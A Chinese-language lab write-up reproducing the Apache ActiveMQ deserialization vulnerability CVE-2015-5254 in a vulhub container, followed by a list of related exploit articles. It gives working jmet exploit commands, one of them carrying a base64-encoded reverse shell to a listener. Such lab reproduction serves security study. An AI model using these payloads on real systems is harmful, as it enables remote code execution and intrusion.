ActiveMQ 反序列化漏洞復現(CVE-2015-5254)
環境搭建
影響Apache ActiveMQ 5.13.0之前的版本
使用vulhub搭建環境,docker-compose up -d
環境搭建以後,開始監聽8161和61616兩個埠,其中8161是web管理端的埠,61616是工作埠。
復現過程
- 構造(可以使用ysoserial)可執行命令的序列化物件
- 作為一個訊息,傳送給目標61616埠
- 訪問web管理頁面,讀取訊息,觸發漏洞
生成序列化物件
使用jmt生成,在同目錄下建立一個external資料夾,不然可能報檔案不存在錯誤。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616
在伺服器中執行:docker-compose exec activemq bash,ls /tmp,發現success生成。
將生成的序列化物件中的payload變成反彈webshell的命令
使用base64編碼反彈shell命令在進行生成
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME IP 61616
相關文章
- Fastjson反序列化漏洞復現ASTJSON
- Fastjson1.2.24反序列化漏洞復現ASTJSON
- Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現ApacheMQ
- Apache漏洞復現Apache
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 網站安全防護-PHP反序列化漏洞修復網站PHP
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- weblogic ssrf漏洞復現Web
- 【漏洞復現】Redis未授權訪問漏洞Redis
- 修復weblogic的JAVA反序列化漏洞的多種方法WebJava
- Weblogic-SSRF漏洞復現Web
- nginx目錄穿越漏洞復現Nginx
- 【漏洞復現】Paraluni 安全事件分析事件
- Redis未授權漏洞復現Redis
- php反序列化漏洞PHP
- WEB漏洞——PHP反序列化WebPHP
- Weblogic修復"Java反序列化"過程遠端命令執行漏洞WebJava
- PHP檔案包含漏洞(利用phpinfo)復現PHP
- PHPMailer遠端命令執行漏洞復現PHPAI
- 常見中介軟體漏洞復現(上)
- java反序列化——apache-shiro復現分析JavaApache
- Fastjson 反序列化漏洞史ASTJSON
- PHP反序列化漏洞總結PHP
- php xss 反序列化漏洞PHP
- PHP現反序列化漏洞 或使WordPress遭遠端攻擊PHP
- 漏洞分析 | Dubbo2.7.7反序列化漏洞繞過分析
- 技術分享 | Fastjson-RCE漏洞復現ASTJSON
- tomcat弱口令後臺getshell漏洞復現Tomcat
- 從CVE復現看棧溢位漏洞利用
- nginx檔名邏輯漏洞_CVE-2013-4547漏洞復現Nginx
- 詳解ShellShock 漏洞復現原理,內附ShellShock的修復方法
- Web安全之PHP反序列化漏洞WebPHP
- Apache Shiro 反序列化漏洞分析Apache
- Shiro 550反序列化漏洞分析
- Weblogic核心元件反序列化漏洞修復方案(CVE-2020-14825)Web元件
- ActiveMQ + Camel 實現訊息路由MQ路由
- apache log4j2 漏洞復現linuxApacheLinux
- Java安全之Cas反序列化漏洞分析Java